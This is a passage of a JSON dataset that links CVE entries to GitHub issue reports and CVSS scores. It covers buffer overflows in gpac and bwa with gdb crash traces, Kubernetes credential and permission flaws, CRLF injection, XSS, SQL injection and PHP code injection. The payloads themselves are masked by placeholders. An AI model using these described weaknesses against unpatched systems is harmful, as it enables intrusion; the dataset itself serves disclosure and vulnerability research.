  34183. "Repo_new": "openid/ruby-openid",
  34184. "Issue_Created_At": "2019-06-11T13:50:34Z",
  34185. "description": "Question concerning CVETAG . Hi, I have a question concerning the recently CVE NUMBERTAG Could you provide some background which version/commit fixes the issue? Rubygems NUMBERTAG only shows version NUMBERTAG Was version NUMBERTAG pulled because of the CVE or was NUMBERTAG just not uploaded by accident ? Thanks NUMBERTAG URLTAG NUMBERTAG URLTAG",
  34186. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34187. "severity": "CRITICAL",
  34188. "baseScore": 9.8,
  34189. "impactScore": 5.9,
  34190. "exploitabilityScore": 3.9
  34191. },
  34192. {
  34193. "CVE_ID": "CVE-2019-11038",
  34194. "Issue_Url_old": "https://github.com/libgd/libgd/issues/501",
  34195. "Issue_Url_new": "https://github.com/libgd/libgd/issues/501",
  34196. "Repo_new": "libgd/libgd",
  34197. "Issue_Created_At": "2019-05-31T20:28:02Z",
  34198. "description": "Uninitialized read in APITAG ( CVETAG ). There is a GD related issue fixed in PHP NUMBERTAG and NUMBERTAG which was assigned CVETAG and is in the PHP bug CVETAG . Filling the issue for the correlated issue in the libgd library itself.",
  34199. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  34200. "severity": "MEDIUM",
  34201. "baseScore": 5.3,
  34202. "impactScore": 1.4,
  34203. "exploitabilityScore": 3.9
  34204. },
  34205. {
  34206. "CVE_ID": "CVE-2019-11082",
  34207. "Issue_Url_old": "https://github.com/dkpro/dkpro-core/issues/1325",
  34208. "Issue_Url_new": "https://github.com/dkpro/dkpro-core/issues/1325",
  34209. "Repo_new": "dkpro/dkpro-core",
  34210. "Issue_Created_At": "2019-02-12T13:00:10Z",
  34211. "description": "Avoid datasets being extracted outside their target directory. It should be ensured that datasets are only extracted inside their respective cache folder.",
  34212. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  34213. "severity": "HIGH",
  34214. "baseScore": 7.5,
  34215. "impactScore": 3.6,
  34216. "exploitabilityScore": 3.9
  34217. },
  34218. {
  34219. "CVE_ID": "CVE-2019-11221",
  34220. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1203",
  34221. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1203",
  34222. "Repo_new": "gpac/gpac",
  34223. "Issue_Created_At": "2019-02-12T03:44:32Z",
  34224. "description": "buffer overflow issue NUMBERTAG There is a buffer overflow issue in gf_import_message () function, media_import.c APITAG overflow when srt file contains more than one txt line and the line is long enough, please see attached crafted file. FILETAG APITAG APITAG import, APITAG e, char format, ...) { if APITAG e ? GF_LOG_WARNING : GF_LOG_INFO)) { va_list args; char APITAG va_start(args, format); APITAG format, args); va_end(args); GF_LOG((u NUMBERTAG e ? GF_LOG_WARNING : GF_LOG_INFO), GF_LOG_AUTHOR, (\"%s \", APITAG ); } return e; } PATHTAG (gdb) set args srt NUMBERTAG crafted_text.srt (gdb) r Starting program: PATHTAG srt NUMBERTAG crafted_text.srt APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG Timed Text (SRT) import text track NUMBERTAG font Serif (size NUMBERTAG Bad SRT formatting expecting number got \"hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hel\" stack smashing detected : PATHTAG terminated Program received signal SIGABRT, Aborted NUMBERTAG ffff NUMBERTAG bc NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG PATHTAG No such file or directory. (gdb) bt NUMBERTAG ffff NUMBERTAG bc NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG ffff NUMBERTAG f NUMBERTAG in __GI_abort () at APITAG NUMBERTAG ffff NUMBERTAG a4 in __libc_message (do_abort=do_abort APITAG fmt=fmt APITAG \" %s : %s terminated \") at PATHTAG NUMBERTAG ffff NUMBERTAG fbbc in __GI___fortify_fail (msg=<optimized out>, msg APITAG \"stack smashing detected\") at APITAG NUMBERTAG ffff NUMBERTAG fb NUMBERTAG in __stack_chk_fail () at APITAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG eb in gf_import_message (import NUMBERTAG fffffff9b NUMBERTAG e=GF_CORRUPTED_DATA, format NUMBERTAG ffff7b3d7f0 APITAG SRT formatting expecting number got %s \") at APITAG NUMBERTAG ffff NUMBERTAG db NUMBERTAG in gf_text_import_srt (import NUMBERTAG fffffff9b NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG e NUMBERTAG in gf_import_timed_text (import NUMBERTAG fffffff9b NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG ded NUMBERTAG in gf_media_import (importer NUMBERTAG fffffff9b NUMBERTAG at APITAG NUMBERTAG c NUMBERTAG c in APITAG (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at APITAG NUMBERTAG d NUMBERTAG in main (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at APITAG (gdb) If you indentify this issue as a vulnerability, please provide me with following information NUMBERTAG the affected versions NUMBERTAG patch NUMBERTAG please assign a CVE ID, discoverer is Guoxiang Niu, APITAG Team",
  34225. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  34226. "severity": "HIGH",
  34227. "baseScore": 7.8,
  34228. "impactScore": 5.9,
  34229. "exploitabilityScore": 1.8
  34230. },
  34231. {
  34232. "CVE_ID": "CVE-2019-11222",
  34233. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1205",
  34234. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1205",
  34235. "Repo_new": "gpac/gpac",
  34236. "Issue_Created_At": "2019-02-13T09:49:56Z",
  34237. "description": "buffer overflow issue NUMBERTAG there is a buffer overflow issue for crypt feature when use a FILETAG file. overflow occur when use a crafted ID NUMBERTAG alue. PATHTAG gdb APITAG (gdb) set args crypt FILETAG overview.mp4 out overview_encrypted.mp4 (gdb) r Starting program: PATHTAG crypt FILETAG overview.mp4 out overview_encrypted.mp4 APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG [CORE NUMBERTAG bit blob is not NUMBERTAG bytes long: APITAG [XML/NHML] Cannot parse ID NUMBERTAG stack smashing detected : PATHTAG terminated Program received signal SIGABRT, Aborted NUMBERTAG ffff NUMBERTAG bc NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG PATHTAG No such file or directory. (gdb) bt NUMBERTAG ffff NUMBERTAG bc NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG ffff NUMBERTAG f NUMBERTAG in __GI_abort () at APITAG NUMBERTAG ffff NUMBERTAG a4 in __libc_message (do_abort=do_abort APITAG fmt=fmt APITAG \" %s : %s terminated \") at PATHTAG NUMBERTAG ffff NUMBERTAG fbbc in __GI___fortify_fail (msg=<optimized out>, msg APITAG \"stack smashing detected\") at APITAG NUMBERTAG ffff NUMBERTAG fb NUMBERTAG in __stack_chk_fail () at APITAG NUMBERTAG ffff NUMBERTAG in gf_xml_parse_bit_sequence_bs (bsroot NUMBERTAG d0, bs NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG f in gf_xml_parse_bit_sequence (bsroot NUMBERTAG d0, data NUMBERTAG ffffffbdcb8, data_size NUMBERTAG ffffffbdc NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG e NUMBERTAG in gf_cenc_parse_drm_system_info (mp NUMBERTAG c NUMBERTAG drm_file NUMBERTAG fffffffe7db APITAG at APITAG NUMBERTAG ffff NUMBERTAG ec in gf_crypt_file (mp NUMBERTAG c NUMBERTAG drm_file NUMBERTAG fffffffe7db APITAG at APITAG NUMBERTAG c in APITAG (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at APITAG NUMBERTAG d NUMBERTAG in main (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at APITAG If you indentify this issue as a vulnerability, please provide me with following information NUMBERTAG the affected versions NUMBERTAG patch NUMBERTAG please assign a CVE ID, discoverer is Guoxiang Niu, APITAG Team",
  34238. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  34239. "severity": "HIGH",
  34240. "baseScore": 7.8,
  34241. "impactScore": 5.9,
  34242. "exploitabilityScore": 1.8
  34243. },
  34244. {
  34245. "CVE_ID": "CVE-2019-11222",
  34246. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1204",
  34247. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1204",
  34248. "Repo_new": "gpac/gpac",
  34249. "Issue_Created_At": "2019-02-13T07:12:39Z",
  34250. "description": "buffer overflow issue NUMBERTAG there is a buffer overflow issue for crypt feature when use a FILETAG file. PATHTAG gdb APITAG (gdb) set args crypt FILETAG overview.mp4 out overview_encrypted.mp4 (gdb) r Starting program: PATHTAG crypt FILETAG overview.mp4 out overview_encrypted.mp4 APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG [CORE NUMBERTAG bit blob is not NUMBERTAG bytes long: APITAG [CENC] Cannnot parse key value Error in ERRORTAG %s': %s NUMBERTAG s \") at PATHTAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG e in malloc_printerr (ptr=<optimized out>, str NUMBERTAG ffff NUMBERTAG a NUMBERTAG APITAG corrupted unsorted chunks\", action NUMBERTAG at APITAG NUMBERTAG int_free (av=<optimized out>, p=<optimized out>, have_lock NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG e1b in APITAG () from PATHTAG NUMBERTAG ffff NUMBERTAG d9 in gzclose_r () from PATHTAG NUMBERTAG ffff NUMBERTAG fd in xml_sax_read_file (parser NUMBERTAG ba NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG db2 in gf_xml_sax_parse_file (parser NUMBERTAG ba NUMBERTAG APITAG APITAG APITAG at APITAG NUMBERTAG ffff NUMBERTAG c NUMBERTAG a in load_crypt_file (file NUMBERTAG fffffffe7d3 APITAG at APITAG NUMBERTAG ffff NUMBERTAG ad in gf_crypt_file (mp NUMBERTAG c NUMBERTAG drm_file NUMBERTAG fffffffe7d3 APITAG at APITAG NUMBERTAG c in APITAG (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at APITAG NUMBERTAG d NUMBERTAG in main (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at APITAG (gdb)",
  34251. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  34252. "severity": "HIGH",
  34253. "baseScore": 7.8,
  34254. "impactScore": 5.9,
  34255. "exploitabilityScore": 1.8
  34256. },
  34257. {
  34258. "CVE_ID": "CVE-2019-11236",
  34259. "Issue_Url_old": "https://github.com/urllib3/urllib3/issues/1553",
  34260. "Issue_Url_new": "https://github.com/urllib3/urllib3/issues/1553",
  34261. "Repo_new": "urllib3/urllib3",
  34262. "Issue_Created_At": "2019-03-18T17:17:07Z",
  34263. "description": "CRLF injection vulnerability. At CVETAG there's an issue in Python's urllib that an attacker controlling the request parameter can inject headers by injecting CR/LF chars. A commenter mentions that the same bug is present in urllib3: CVETAG So reporting it here to make sure it gets attention.",
  34264. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  34265. "severity": "MEDIUM",
  34266. "baseScore": 6.1,
  34267. "impactScore": 2.7,
  34268. "exploitabilityScore": 2.8
  34269. },
  34270. {
  34271. "CVE_ID": "CVE-2019-11243",
  34272. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/76797",
  34273. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/76797",
  34274. "Repo_new": "kubernetes/kubernetes",
  34275. "Issue_Created_At": "2019-04-18T21:31:53Z",
  34276. "description": "CVETAG NUMBERTAG APITAG does not remove the serviceaccount credentials from config created by APITAG The APITAG method return a copy of the provided config, with credentials removed (bearer token, username/password, and client certificate/key data). In the following versions, APITAG did not effectively clear service account credentials loaded using APITAG NUMBERTAG What is the impact? APITAG users that use the APITAG method directly with client config loaded with APITAG receive back a client config which can still send the loaded service account token with requests. How was the issue fixed? In NUMBERTAG and NUMBERTAG APITAG was modified to return a client config that is safe to use with the APITAG method ( URLTAG In NUMBERTAG the APITAG will also exclude the APITAG and APITAG fields, in addition to the explicit credential carrying fields. ( URLTAG How do I resolve the issue? Upgrade APITAG to APITAG , APITAG , APITAG , or higher or manually clear the APITAG and APITAG fields in addition to calling APITAG Thanks to Oleg Bulatov for reporting this issue. /area security /kind bug /sig auth /sig api machinery /assign /close",
  34277. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34278. "severity": "HIGH",
  34279. "baseScore": 8.1,
  34280. "impactScore": 5.9,
  34281. "exploitabilityScore": 2.2
  34282. },
  34283. {
  34284. "CVE_ID": "CVE-2019-11244",
  34285. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/76676",
  34286. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/76676",
  34287. "Repo_new": "kubernetes/kubernetes",
  34288. "Issue_Created_At": "2019-04-16T20:14:25Z",
  34289. "description": "World writeable http cache. What happened: The files inside of \".kube/http cache\" are world writeable (rw rw rw ). While the default for these files appears to be the home directory, using the \" cache dir\" flag could put these files into a place where world writeable files would allow any user / process to modify the cache files. Modification of the cache files could influence the kubectl utility in a negative way for other users. What you expected to happen: Apply stricter file permissions to the http cache files. How to reproduce it (as minimally and precisely as possible): Run any generic kubectl command which is successful and then list the cache directory PATHTAG $ kubectl get pods all namespaces $ ls la PATHTAG Anything else we need to know?: I estimate this is a low severity security issue with a CVSS score of NUMBERTAG PATHTAG URLTAG Environment: Linux Kubernetes version (use kubectl APITAG Version: APITAG Minor NUMBERTAG APITAG APITAG APITAG APITAG NUMBERTAG T NUMBERTAG Z\", APITAG Compiler:\"gc\", Platform:\"linux/amd NUMBERTAG Server Version: APITAG Minor NUMBERTAG APITAG APITAG APITAG APITAG NUMBERTAG T NUMBERTAG Z\", APITAG Compiler:\"gc\", Platform:\"linux/amd NUMBERTAG Cloud provider or hardware configuration: AWS. Running kube api server in hyperkube. OS (e.g: cat /etc/os release): APITAG Linux\" APITAG APITAG ID=\"centos\" ID_LIKE=\"rhel fedora\" VERSION_ID NUMBERTAG APITAG Linu NUMBERTAG APITAG ANSI_COLOR NUMBERTAG APITAG HOME_URL=\" FILETAG \" BUG_REPORT_URL=\" CVETAG \" APITAG NUMBERTAG APITAG APITAG APITAG APITAG Kernel (e.g. uname a): Linux APITAG NUMBERTAG APITAG NUMBERTAG SMP Tue Aug NUMBERTAG UTC NUMBERTAG APITAG Install tools: Manual installation. Others: n/a",
  34290. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N",
  34291. "severity": "MEDIUM",
  34292. "baseScore": 5.0,
  34293. "impactScore": 3.6,
  34294. "exploitabilityScore": 1.3
  34295. },
  34296. {
  34297. "CVE_ID": "CVE-2019-11245",
  34298. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/78308",
  34299. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/78308",
  34300. "Repo_new": "kubernetes/kubernetes",
  34301. "Issue_Created_At": "2019-05-24T16:14:49Z",
  34302. "description": "Container uid changes after first restart. APITAG What happened : When I launch a pod from a docker image that specifies a USER in the Dockerfile, the container only runs as that user on its first launch. After that the container runs as UID NUMBERTAG What you expected to happen : I expect the container to act consistently every launch, and probably with the USER specified in the container. How to reproduce it (as minimally and precisely as possible) : Testing with minikube (same test specifying NUMBERTAG kubectl logs test always returns NUMBERTAG ERRORTAG Anything else we need to know? : Environment : Kubernetes version (use kubectl version ): I get the results I expect in NUMBERTAG and NUMBERTAG The problem exists in NUMBERTAG and NUMBERTAG Cloud provider or hardware configuration: minikube NUMBERTAG using APITAG OS (e.g: APITAG ): Kernel (e.g. ERRORTAG ): Install tools: Network plugin and version (if this is a network related bug): Others:",
  34303. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  34304. "severity": "HIGH",
  34305. "baseScore": 7.8,
  34306. "impactScore": 5.9,
  34307. "exploitabilityScore": 1.8
  34308. },
  34309. {
  34310. "CVE_ID": "CVE-2019-11247",
  34311. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/80983",
  34312. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/80983",
  34313. "Repo_new": "kubernetes/kubernetes",
  34314. "Issue_Created_At": "2019-08-05T12:44:08Z",
  34315. "description": "WIP Placeholder Issue NUMBERTAG Please don't remove or close this issue. I will be updating it later today. /area security",
  34316. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  34317. "severity": "HIGH",
  34318. "baseScore": 8.1,
  34319. "impactScore": 5.2,
  34320. "exploitabilityScore": 2.8
  34321. },
  34322. {
  34323. "CVE_ID": "CVE-2019-11248",
  34324. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/81023",
  34325. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/81023",
  34326. "Repo_new": "kubernetes/kubernetes",
  34327. "Issue_Created_At": "2019-08-06T14:34:33Z",
  34328. "description": "CVETAG : /debug/pprof exposed on kubelet's healthz port. The debugging endpoint APITAG is exposed over the unauthenticated Kubelet healthz port. Versions prior to NUMBERTAG and NUMBERTAG are affected. The issue is of medium severity, but not exposed by the default configuration. If you are exposed we recommend upgrading to at least one of the versions listed. Am I vulnerable? By default, the Kubelet exposes unauthenticated healthz endpoints on port NUMBERTAG but only over localhost. If your nodes are using a non localhost APITAG ( health bind address), and an older version, you may be vulnerable. If your nodes are using the default localhost APITAG it is only exposed to pods or processes running in the host network namespace. Run kubectl get nodes to see whether nodes are running a vulnerable version. Run APITAG to check whether the APITAG is non local. How do I mitigate the vulnerability? Upgrade to a patched version NUMBERTAG or NUMBERTAG or, update node configurations to set the APITAG to APITAG URLTAG fixed in NUMBERTAG URLTAG fixed in NUMBERTAG URLTAG fixed in NUMBERTAG URLTAG fixed in NUMBERTAG ulnerability Details The go pprof endpoint is exposed over the Kubelet's healthz port. This debugging endpoint can potentially leak sensitive information such as internal Kubelet memory addresses and configuration, or for limited denial of service. Thanks to Jordan Zebor of F5 Networks for reporting this problem. /area security /close",
  34329. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L",
  34330. "severity": "HIGH",
  34331. "baseScore": 8.2,
  34332. "impactScore": 4.2,
  34333. "exploitabilityScore": 3.9
  34334. },
  34335. {
  34336. "CVE_ID": "CVE-2019-11249",
  34337. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/80984",
  34338. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/80984",
  34339. "Repo_new": "kubernetes/kubernetes",
  34340. "Issue_Created_At": "2019-08-05T12:44:23Z",
  34341. "description": "WIP Placeholder Issue NUMBERTAG Please don't remove or close this issue. I will be updating it later today. /area security",
  34342. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  34343. "severity": "MEDIUM",
  34344. "baseScore": 6.5,
  34345. "impactScore": 3.6,
  34346. "exploitabilityScore": 2.8
  34347. },
  34348. {
  34349. "CVE_ID": "CVE-2019-11250",
  34350. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/81114",
  34351. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/81114",
  34352. "Repo_new": "kubernetes/kubernetes",
  34353. "Issue_Created_At": "2019-08-08T02:03:04Z",
  34354. "description": "Bearer tokens are revealed in logs. This issue was reported in the FILETAG Description Kubernetes requires an authentication mechanism to enforce users\u2019 privileges. One method of authentication, bearer tokens, are opaque strings used to associate a user with their having successfully authenticated previously. Any user with possession of this token may masquerade as the original user (the \u201cbearer\u201d) without further authentication. Within Kubernetes, the bearer token is captured within the hyperkube kube apiserver system logs at high verbosity levels NUMBERTAG A malicious user with access to the system logs on such a system could masquerade as any user who has previously logged into the system. Exploit Scenario Alice logs into a Kubernetes cluster and is issued a Bearer token. The system logs her token. Eve, who has access to the logs but not the production Kubernetes cluster, replays Alice\u2019s Bearer token, and can masquerade as Alice to the cluster. Recommendation Short term, remove the Bearer token from the log. Do not log any authentication credentials within the system, including tokens, private keys, or passwords that may be used to authenticate to the production Kubernetes cluster, regardless of the logging level. Long term, either implement policies that enforce code review to ensure that sensitive data is not exposed in logs, or implement logging filters that check for sensitive data and remove it prior to outputting the log. In either case, ensure that sensitive data cannot be trivially stored in logs.",
  34355. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  34356. "severity": "MEDIUM",
  34357. "baseScore": 6.5,
  34358. "impactScore": 3.6,
  34359. "exploitabilityScore": 2.8
  34360. },
  34361. {
  34362. "CVE_ID": "CVE-2019-11251",
  34363. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/87773",
  34364. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/87773",
  34365. "Repo_new": "kubernetes/kubernetes",
  34366. "Issue_Created_At": "2020-02-03T15:12:22Z",
  34367. "description": "CVETAG : kubectl cp symlink vulnerability. A security issue was discovered in kubectl versions NUMBERTAG and NUMBERTAG The issue is of a medium severity and upgrading of kubectl is encouraged to fix the vulnerability. Am I vulnerable? Run kubectl version client and if it returns versions NUMBERTAG and NUMBERTAG you are running a vulnerable version. How do I upgrade? Follow installation instructions here Install and Set Up kubectl Kubernetes NUMBERTAG Not all instructions will provide up to date kubectl versions at the time of this announcement. So, always confirm with kubectl version client. Vulnerability Details The details for this vulnerability are very similar to CVETAG and CVETAG . A vulnerability has been discovered in kubectl cp that allows a combination of two symlinks to copy a file outside of its destination directory. This could be used to allow an attacker to place a netfarious file using a symlink, outside of the destination tree. This issue is filed as CVETAG . Two fixes were formulated, one fix to remove symlink support going forwards and a fix with cherry picks made to ensure backwards compatibility. See URLTAG for the primary fix in NUMBERTAG which removes the support of symlinks in kubectl cp. After version NUMBERTAG symlink support with kubectl cp is removed, it is recommended instead to use a combination of exec+tar. A second fix has been made to NUMBERTAG and backported to NUMBERTAG and NUMBERTAG This changes the kubectl cp un tar symlink logic, by unpacking the symlinks after all the regular files have been unpacked. This then guarantees that a file can\u2019t be written through a symlink. See URLTAG for the fix to version NUMBERTAG The following Cherry picks were made from this fix to earlier versions of NUMBERTAG and NUMBERTAG See URLTAG for version NUMBERTAG See URLTAG for version NUMBERTAG Thank you to Erik Sj\u00f6lund ( APITAG for discovering this issue, Tim Allclair and Maciej Szulik for both fixes and the patch release managers for including the fix in their releases. /close",
  34368. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N",
  34369. "severity": "MEDIUM",
  34370. "baseScore": 5.7,
  34371. "impactScore": 3.6,
  34372. "exploitabilityScore": 2.1
  34373. },
  34374. {
  34375. "CVE_ID": "CVE-2019-11253",
  34376. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/83253",
  34377. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/83253",
  34378. "Repo_new": "kubernetes/kubernetes",
  34379. "Issue_Created_At": "2019-09-27T16:53:31Z",
  34380. "description": "Kubectl YAML parsing vulnerable to APITAG Laughs\" Attack.. Introduction Posting this as an issue following report to the security list who suggested putting it here as it's already public in a Stackoverflow question here URLTAG What happened : When creating a APITAG object which has recursive references contained in it, excessive CPU usage can occur. This appears to be an instance of a APITAG Laughs\" attack URLTAG which is quite well known as an XML parsing issue. Applying this manifest to a cluster causes the client to hang for some time with considerable CPU usage. CODETAG What you expected to happen : Ideally it would be good for a maximum size of entity to be defined, or perhaps some limit on recursive references in YAML parsed by kubectl. One note is that the original poster on Stackoverflow indicated that the resource consumption was in APITAG but both tests I did NUMBERTAG client against NUMBERTAG Kubeadm cluster and NUMBERTAG client against NUMBERTAG kubeadm cluster) showed the CPU usage client side. How to reproduce it (as minimally and precisely as possible) : Get the manifest above and apply to a cluster as normal with APITAG . Use top or another CPU monitor to observe the quantity of CPU time used. Anything else we need to know? : Environment : Kubernetes version (use kubectl version ): test NUMBERTAG linux AMD NUMBERTAG client, Kubeadm cluster running in kind) CODETAG test NUMBERTAG APITAG AMD NUMBERTAG client, Kubeadm cluster running in APITAG Workstation) CODETAG",
  34381. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  34382. "severity": "HIGH",
  34383. "baseScore": 7.5,
  34384. "impactScore": 3.6,
  34385. "exploitabilityScore": 3.9
  34386. },
  34387. {
  34388. "CVE_ID": "CVE-2019-11254",
  34389. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/89535",
  34390. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/89535",
  34391. "Repo_new": "kubernetes/kubernetes",
  34392. "Issue_Created_At": "2020-03-26T18:55:26Z",
  34393. "description": "WIP.",
  34394. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  34395. "severity": "MEDIUM",
  34396. "baseScore": 6.5,
  34397. "impactScore": 3.6,
  34398. "exploitabilityScore": 2.8
  34399. },
  34400. {
  34401. "CVE_ID": "CVE-2019-11255",
  34402. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/85233",
  34403. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/85233",
  34404. "Repo_new": "kubernetes/kubernetes",
  34405. "Issue_Created_At": "2019-11-13T20:57:31Z",
  34406. "description": "WIP Placeholder. APITAG",
  34407. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N",
  34408. "severity": "MEDIUM",
  34409. "baseScore": 6.5,
  34410. "impactScore": 5.2,
  34411. "exploitabilityScore": 1.2
  34412. },
  34413. {
  34414. "CVE_ID": "CVE-2019-11359",
  34415. "Issue_Url_old": "https://github.com/mkucej/i-librarian/issues/138",
  34416. "Issue_Url_new": "https://github.com/mkucej/i-librarian/issues/138",
  34417. "Repo_new": "mkucej/i-librarian",
  34418. "Issue_Created_At": "2019-04-17T12:19:38Z",
  34419. "description": "XSS vulnerability in FILETAG . Summary The parameter project is not sanitized, so attackers can poison this parameter and then create a reflected XSS attack. APITAG APITAG Details The flaw exists since APITAG was assigned to a GET parameter without sanitizing APITAG then, APITAG was printed without escaping CODETAG",
  34420. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  34421. "severity": "MEDIUM",
  34422. "baseScore": 6.1,
  34423. "impactScore": 2.7,
  34424. "exploitabilityScore": 2.8
  34425. },
  34426. {
  34427. "CVE_ID": "CVE-2019-11362",
  34428. "Issue_Url_old": "https://github.com/rocboss/ROCBOSS/issues/12",
  34429. "Issue_Url_new": "https://github.com/rocboss/rocboss-old/issues/12",
  34430. "Repo_new": "rocboss/rocboss-old",
  34431. "Issue_Created_At": "2019-04-18T05:49:41Z",
  34432. "description": "ROCBOSS NUMBERTAG has SQL injection via the APITAG score paramter.. Verify that sql injection requires registration and score NUMBERTAG URLTAG ERRORTAG URLTAG The $score is not filtered, and the sql statement query is directly executed. APITAG roc_user SET score APITAG score APITAG uid APITAG send http request: APITAG CODETAG FILETAG",
  34433. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34434. "severity": "CRITICAL",
  34435. "baseScore": 9.8,
  34436. "impactScore": 5.9,
  34437. "exploitabilityScore": 3.9
  34438. },
  34439. {
  34440. "CVE_ID": "CVE-2019-11371",
  34441. "Issue_Url_old": "https://github.com/lh3/bwa/issues/239",
  34442. "Issue_Url_new": "https://github.com/lh3/bwa/issues/239",
  34443. "Repo_new": "lh3/bwa",
  34444. "Issue_Created_At": "2019-04-16T17:43:42Z",
  34445. "description": "[bwa_index] Pack FASTA... buffer overflow detected . I found a buffer overflow in [bns_fasta2bntseq] function. CODETAG The name buffer has only NUMBERTAG bytes, in order that buffer overflow occurs if we pass more than NUMBERTAG bytes as prefix.",
  34446. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34447. "severity": "CRITICAL",
  34448. "baseScore": 9.8,
  34449. "impactScore": 5.9,
  34450. "exploitabilityScore": 3.9
  34451. },
  34452. {
  34453. "CVE_ID": "CVE-2019-11376",
  34454. "Issue_Url_old": "https://github.com/inunosinsi/soycms/issues/5",
  34455. "Issue_Url_new": "https://github.com/inunosinsi/soycms/issues/5",
  34456. "Repo_new": "inunosinsi/soycms",
  34457. "Issue_Created_At": "2019-04-02T07:56:02Z",
  34458. "description": "There is one vulnerability that can APITAG arbitrary php code). There is one vulnerability that can APITAG arbitrary php code) Affected APITAG NUMBERTAG Type of APITAG arbitrary php code(can getshell) Discovered by: Ryan0lb First,we can install the cms successlly,and we can create a new website FILETAG we can insert arbitrary php code in the URLTAG FILETAG FILETAG APITAG can insert the malicious code,and getshell FILETAG",
  34459. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  34460. "severity": "HIGH",
  34461. "baseScore": 7.2,
